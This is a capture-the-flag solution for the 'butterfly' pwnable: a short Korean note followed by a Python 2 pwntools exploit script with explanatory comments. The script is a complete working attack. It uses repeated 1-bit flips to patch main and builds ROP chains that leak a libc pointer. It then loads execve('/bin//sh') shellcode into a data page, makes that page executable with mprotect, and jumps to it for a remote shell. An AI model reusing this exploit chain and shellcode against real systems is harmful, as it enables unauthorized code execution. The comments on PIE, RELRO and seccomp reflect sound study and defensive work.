1bit flip을 하게 해주는 문제.
main 함수에 명령어 몇 개 바꿔서 ROP 하면 됨.
hahah 님의 빠른 풀이전략을 듣고 익스코드 작성.
# Exploit script for the "butterfly" pwnable, written for Python 2 / pwntools
# (print statement, raw_input, str.encode('hex')).
#
# Structure of every request sent below: an 8-digit decimal string, left-justified
# to 40 bytes, followed by one packed 64-bit address (plus a ROP chain in the
# later requests). The intro says the service performs a single 1-bit flip; the
# decimal number presumably selects the bit and the packed value after the padding
# presumably overwrites main's saved return address so main runs again -- this is
# inferred from the payload layout, not shown by the code itself.
from pwn import *
import time
context.arch = 'amd64' # i386 / arm
# 30-byte x86-64 machine code: the literal embeds "/bin//sh" (2F 62 69 6E 2F 2F 73 68)
# and ends with 0F 05 (syscall). It is fed to fgets() in chain 2 and executed in chain 3.
SH = "\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"
# recvuntil sendline, pack, recv, send
r = remote('butterfly.pwning.xxx', 9999)
#r = process(['stdbuf', '-o', '0', '-i', '0', './butterfly'])
# Pause so a debugger can be attached when running against the local process() above.
raw_input('attach')
# start pwn.
# Flip 1 -- "0x48 -> 0x08" is the author's note; the exact instruction patched is not
# shown on the page. Each of the next three requests patches one byte of main and
# returns to main so the next flip can be requested.
# 0x48 -> 0x08
main = 0x400788
TARGET1 = '33571614'.ljust(40, ' ') #33571608 + ?  (presumably addr*8 + bit; 33571614 >> 3 == 0x400863 -- verify against the binary)
TARGET1 += pack(main)
print r.recv(1000)
r.sendline(TARGET1)
# Flip 2: the author's note says this creates the "pop rdx" gadget; the poprdx
# constant used later is 0x400864, inside the main+206..+212 epilogue listed in the
# string below.
# create rdx gadget
TARGET22 = '33571616'.ljust(40, ' ')
TARGET22 += pack(main)
print r.recv(1000)
r.sendline(TARGET22)
# Flip 3: enlarges the fgets() size argument so the later, longer ROP payloads fit.
# change fgets size
TARGET2 = '33570343'.ljust(40, ' ')
TARGET2 += pack(main)
print r.recv(1000)
r.sendline(TARGET2)
# Flip 4 (jne -> je) is sent together with the first full ROP chain (TARGET32 below).
# jne -> je
TARGET32 = '33571544'.ljust(40, ' ')
# Gadget notes kept from the author's disassembly. They explain the padding
# words in the chains below: the pop-rsi gadget at main+208 also pops r15 and rbp
# (2 filler words), the pop-rdx gadget at main+206 also pops r14, r15 and rbp
# (3 filler words).
'''
pattern 5fc3 found at 0x4008f3
POP RDI; RET;
0x4007c8 <main+208>: pop %rsi
0x4007c9 <main+209>: pop %r15
0x4007cb <main+211>: pop %rbp
0x4007cc <main+212>: retq
0x00000000004007c6 <+206>: pop %rdx
0x00000000004007c7 <+207>: pop %r14
0x00000000004007c9 <+209>: pop %r15
0x00000000004007cb <+211>: pop %rbp
0x00000000004007cc <+212>: retq
'''
# Hard-coded addresses: PLT stubs (fgets/puts/mprotect), stdin's GOT slot and the
# three pop gadgets. All of them are in the 0x400000/0x600000 range, i.e. the binary
# is not position-independent; from a hardening point of view PIE (plus full RELRO
# for the GOT read) is what would take these constants away from an attacker.
fgets = 0x400640
puts = 0x400600
stdin_got = 0x600d30
poprdi = 0x4008f3
poprsi = 0x400866
poprdx = 0x400864
mprotect = 0x400660
raw_input('4')
# Chain 1: puts(stdin_got) -> prints the libc stdin FILE* stored in the GOT, then
# returns to main for the next request.
# start full ROP. fgets
TARGET32 += pack(poprdi)
TARGET32 += pack(stdin_got)
TARGET32 += pack(puts)
TARGET32 += pack(main)
print r.recv(1000)
raw_input()
r.sendline(TARGET32)
raw_input()
leak = r.recv(1000)
print leak
# The pointer is the second line of the reply; reverse the bytes (little-endian)
# and hex-decode to get the integer value. Assumes the reply has at least two lines.
stdin = int(leak.split('\n')[1][::-1].encode('hex'), 16)
print 'stdin : {0}'.format(hex(stdin))
# Chain 2: fgets(0x600800, 0x80, stdin) -- reads the next line sent (SH) into the
# writable data segment at 0x600800, then returns to main. The pack(0) words after
# poprsi/poprdx fill the extra pops listed in the disassembly string above.
TARGET3 = '33571864'.ljust(40, '#')
TARGET3 += pack(poprdi)
TARGET3 += pack(0x600800) # shellcode location
TARGET3 += pack(poprsi)
TARGET3 += pack(0x80)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(poprdx)
TARGET3 += pack(stdin)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(0)
TARGET3 += pack(fgets)
TARGET3 += pack(main)
r.sendline(TARGET3)
# Short sleeps instead of recvuntil(): the script relies on timing for the fgets()
# call to be waiting before SH is sent.
time.sleep(1)
r.sendline(SH)
time.sleep(.5)
print r.recv(1000)
time.sleep(.5)
# Chain 3: mprotect(0x600000, 0x1000, 7) marks the page holding the shellcode
# readable/writable/executable, and the final word "returns" into 0x600800.
# The mprotect(PROT_EXEC) on a data page is the step a seccomp policy or an
# execmem-style control would block, and the one worth alerting on.
TARGET4 = '33571864'.ljust(40, '#')
TARGET4 += pack(poprdi)
TARGET4 += pack(0x600000)
TARGET4 += pack(poprsi)
TARGET4 += pack(0x1000)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(poprdx)
TARGET4 += pack(7)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(0)
TARGET4 += pack(mprotect)
TARGET4 += pack(0x600800) # jump to shellcode
r.sendline(TARGET4)
# get shell?
r.interactive()